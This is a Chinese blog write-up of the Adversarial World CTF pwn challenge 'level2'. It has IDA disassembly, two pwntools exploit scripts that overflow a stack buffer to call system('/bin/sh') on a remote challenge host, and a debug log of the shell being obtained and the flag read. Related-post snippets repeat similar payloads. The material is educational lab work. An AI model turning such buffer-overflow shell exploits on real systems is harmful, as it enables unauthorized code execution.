攻防世界-level2

最新推荐文章于 2024-04-14 21:01:19 发布
最新推荐文章于 2024-04-14 21:01:19 发布
阅读量318 收藏
点赞数 1
分类专栏: 笔记 ctf 攻防世界CTF 文章标签: python 安全 ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_47210241/article/details/130030208
版权

攻防世界-level2

image-20230408153709888

image-20230408153749676

.text:0804844B vulnerable_function proc near           ; CODE XREF: main+11p
.text:0804844B
.text:0804844B buf             = byte ptr -88h
.text:0804844B
.text:0804844B                 push    ebp
.text:0804844C                 mov     ebp, esp
.text:0804844E                 sub     esp, 88h
.text:08048454                 sub     esp, 0Ch
.text:08048457                 push    offset command  ; "echo Input:"
.text:0804845C                 call    _system
.text:08048461                 add     esp, 10h
.text:08048464                 sub     esp, 4
.text:08048467                 push    100h            ; nbytes
.text:0804846C                 lea     eax, [ebp+buf]
.text:08048472                 push    eax             ; buf
.text:08048473                 push    0               ; fd
.text:08048475                 call    _read
.text:0804847A                 add     esp, 10h
.text:0804847D                 nop
.text:0804847E                 leave
.text:0804847F                 retn
.text:0804847F vulnerable_function endp

.text:08048480 main            proc near               ; DATA XREF: _start+17o
.text:08048480
.text:08048480 var_4           = dword ptr -4
.text:08048480 argc            = dword ptr  0Ch
.text:08048480 argv            = dword ptr  10h
.text:08048480 envp            = dword ptr  14h
.text:08048480
.text:08048480                 lea     ecx, [esp+4]
.text:08048484                 and     esp, 0FFFFFFF0h
.text:08048487                 push    dword ptr [ecx-4]
.text:0804848A                 push    ebp
.text:0804848B                 mov     ebp, esp
.text:0804848D                 push    ecx
.text:0804848E                 sub     esp, 4
.text:08048491                 call    vulnerable_function
.text:08048496                 sub     esp, 0Ch
.text:08048499                 push    offset aEchoHelloWorld ; "echo 'Hello World!'"
.text:0804849E                 call    _system
.text:080484A3                 add     esp, 10h
.text:080484A6                 mov     eax, 0
.text:080484AB                 mov     ecx, [ebp+var_4]
.text:080484AE                 leave
.text:080484AF                 lea     esp, [ecx-4]
.text:080484B2                 retn
.text:080484B2 main

image-20230408154001955

image-20230408154033232

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',60839)
#nc 61.147.171.105 
#nc 61.147.171.105 60839
e = ELF("level2")
#pop_rdi_addr = 0x08048519
system_addr = e.symbols['system']
binsh_addr = e.search('/bin/sh').next()

print(system_addr)
print(binsh_addr)




pad=136+4

pause()

#ret_addr=0x0804A024
#payload=b'A'*pad+p32(ret_addr)


delimiter='Input:'
payload = b'A'*pad   + p32(system_addr)+b'dead' + p32(binsh_addr)
#payload = b'A'*(0x88+4) + p32(binsh_addr) + 'dead'+ p32(system_addr)
io.sendlineafter(delimiter,payload)
io.interactive()

#0804A024

or:

 from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',60839)
#nc 61.147.171.105 
#nc 61.147.171.105 60839
e = ELF("level2")
#pop_rdi_addr = 0x08048519
system_addr = 0x08048320
binsh_addr = 0x0804A024

print(system_addr)
print(binsh_addr)



#88h=16*8+8=136
pad=136+4


pause()

#ret_addr=0x0804A024
#payload=b'A'*pad+p32(ret_addr)


delimiter='Input:'
payload = b'A'*pad  + p32(system_addr)+b'dead' + p32(binsh_addr)
#payload = b'A'*(0x88+4) + p32(binsh_addr) + 'dead'+ p32(system_addr)
io.sendlineafter(delimiter,payload)
io.interactive()

#0804A024





giantbranch@ubuntu:~/Desktop/study$ python level2-3.py 
[+] Opening connection to 61.147.171.105 on port 60839: Done
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/home/giantbranch/Desktop/study/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
134513440
134520868
[*] Paused (press any to continue)
[DEBUG] Received 0x7 bytes:
    'Input:\n'
[DEBUG] Sent 0x99 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000080  41 41 41 41  41 41 41 41  41 41 41 41  20 83 04 08  │AAAA│AAAA│AAAA│ ···│
    00000090  64 65 61 64  24 a0 04 08  0a                        │dead│$···│·│
    00000099
[*] Switching to interactive mode

$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x24 bytes:
    'bin\n'
    'dev\n'
    'flag\n'
    'level2\n'
    'lib\n'
    'lib32\n'
    'lib64\n'
bin
dev
flag
level2
lib
lib32
lib64
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x24 bytes:
    'bin\n'
    'dev\n'
    'flag\n'
    'level2\n'
    'lib\n'
    'lib32\n'
    'lib64\n'
bin
dev
flag
level2
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'cyberpeace{9a19ef0dea6816905941e2c63652d2a8}\n'
cyberpeace{9a19ef0dea6816905941e2c63652d2a8}
$
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1652
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界level2
weixin_43489686的博客
03-30 361
我这种菜鸡就打打这种签到题刷刷存在感吧。。。 32位,基本没啥保护 简单溢出 system函数地址和/bin/sh地址都有了 直接上exp from pwn import * p = remote('111.198.29.45',55216) bin_sh = 0x804A024 system = 0x8048320 payload = 'a'*0x88+'a'*4+p32(syst...
攻防世界_level2
RMC131的博客
04-10 4421
checksec IDA exp from pwn import * p = remote('111.200.241.244',58154) payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024) p.recvuntil("Input:") p.send(payload) p.interactive() 运行得到flag
[攻防世界]level2
逆向萌新的博客
05-31 275
[攻防世界]level2
攻防世界 level2
10-04 485
1.题目 2.IDA分析 3.流程分析 流程很简单,输入信息,输出hello world。read函数也存在明显的溢出点。问题是没有找到现成可用的函数cat flag或者调用system函数。因此,只能我们自己构造。 如上图 我们可以获取到system和‘/bin/sh’的地址(注意,/bin/sh在.data段,如果是.rdata段则不能利用,原因还没有找到,可能是因为rdata只读不能执行?知道的读者麻烦评论告知一下~),exp如下: from pwn import...
攻防世界 - Misc - Level 2 - funny-video
12-14
本题的考察的是 MISC 中的音频隐写,要想过此关,你需要知道以下知识点: - 使用 MKVToolNix 查看非默认声道并导出。(`xxx.mp3`) - 使用 Audacity 查看音频的 “频谱图”。
攻防世界 - Misc - Level 2 - Hear-with-your-Eyes
12-13
在现代网络安全领域,攻防世界Misc级别的挑战题目通常旨在引导参与者学习如何通过不同的手法和技术手段来解决特定的问题。在这个题目“Hear-with-your-Eyes”中,我们被引导去深入探索音频隐写术。音频隐写术是一种...
攻防世界 - Misc - Level 3 - Miscellaneous-300
12-14
CTF(Capture The Flag)挑战赛中,攻防世界是一个专门用于训练选手网络安全技能的平台。其中,Misc类别涵盖了多种杂项技能,例如密码学、隐写术、逆向工程等。本关“Miscellaneous-300”专注于音频隐写术,这是一...
攻防世界 - Misc - Level 3 - 打开电动车
12-14
在“攻防世界”这个平台的“Misc”类别下,存在一个名为“打开电动车”的Level 3挑战。这一关卡主要涉及音频隐写(Steganography)的知识点,这是一种信息安全的手段,用于隐藏信息,使他人不易察觉。音频隐写技术...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1543
学习pwn开始,慢慢来不要急
攻防世界 level2
@一个努力学编程的网安小可爱的博客
01-21 2767
攻防世界 level2 优秀题解 exp 脚本 from pwn import* #p=remote("111.200.241.244",58836) p=process("./21") payload=('a'*0x8c).encode()+p32(0x0804845C)+p32(0x0804A024).encode() #payload='a'*(0x8c)+p32(0x804A038)+p32(0)+p32(0x804A024).decode('unicode_escape') p.sendl
攻防世界 - pwn - level2
qq726232111的博客
03-16 271
A、程序分析 1、使用了system() 2、read() -> 缓冲区溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界level2[WriteUP]
如有错误感谢斧正
04-14 414
用checksec、file命令查看文件属性与防护32位小端序二进制文件。
攻防世界PWN-level2
Deeeelete的博客
11-13 1083
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界 Pwn level2
MrTreebook的博客
07-16 596
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
攻防世界和jarvis oj的level2
CNXBDSa的博客
07-27 478
PS:两者题型完全一样 就不过多解释了!!!!!!!! 首先第一步是运行这个程序看程序是什么 然后使用checksec去查看这个的保护机制和位数 详情请去看大佬总结比较详细 然后放入对应的iDA中查看 ...
攻防世界pwn题目
最新发布
03-08
攻防世界CTF竞赛中,PWN类题目通常涉及对二进制程序漏洞的挖掘与利用。这类题目旨在考察参赛者对于常见安全漏洞的理解以及编写有效载荷(Payload)的能力。 #### 格式化字符串漏洞及其应用实例 格式化字符串...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值